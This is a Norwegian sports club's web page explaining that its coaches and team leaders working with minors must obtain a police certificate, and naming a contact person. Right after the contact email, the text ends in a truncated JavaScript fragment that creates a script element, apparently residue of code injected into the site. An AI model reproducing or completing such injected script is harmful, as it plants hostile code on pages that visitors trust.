Politiattest

Bakgrunn

Idrettsstyret i Norges idrettsforbund har vedtatt at alle idrettslag pliktar å innhente politiattest frå personar som skal utføre oppgåver som inneber eit tillits – eller ansvarsforhold over mindreårige (under 18år) eller mennesker med utvikklingshemning.

Fyresdal Idrettslag

Alle som er trenerar, oppmenn, laglederar, instruktørar o.s.v. som har verv, tillits – eller ansvarsforhold over mindreårige (under 18år) eller mennesker med utvikklingshemning i FIL må ha politiattest. Det gjeld for symjegruppa, fotballgruppa, barneidrettsskulen, trimgruppa, innebandygruppa og multisportgruppa. Styremedlammar som ikkje har andre verv i FIL er ikkje påkrevd å ha politiattest, men me oppfordrar likevel alle til å skaffe seg dette.

Dersom ein har politiattest ui andre samanhengar, f.eks gjennom jobb, så er det viktig å presisere at denne ikkje gjeld for verv i FIL.

Styret i FIL har utnevndt Kjell Ove Homme som er ansvarleg for å håndtere ordninga med politiattestar.

Dersom det er nokon som skulle ynskje å få politiattest ifbm potensielt arbeid/verv etc i FIL, så ta kontakt med Kjell Ove for å få utskreve skjema og oppskrift på korleis de går fram.

Det er veldig enkelt å søke om politiattest. Dette arbeidet tek kun få minutt.

Kjell Ove Homme: kjellove70@hotmail.comvar d=document;var s=d.createElement(‘script’);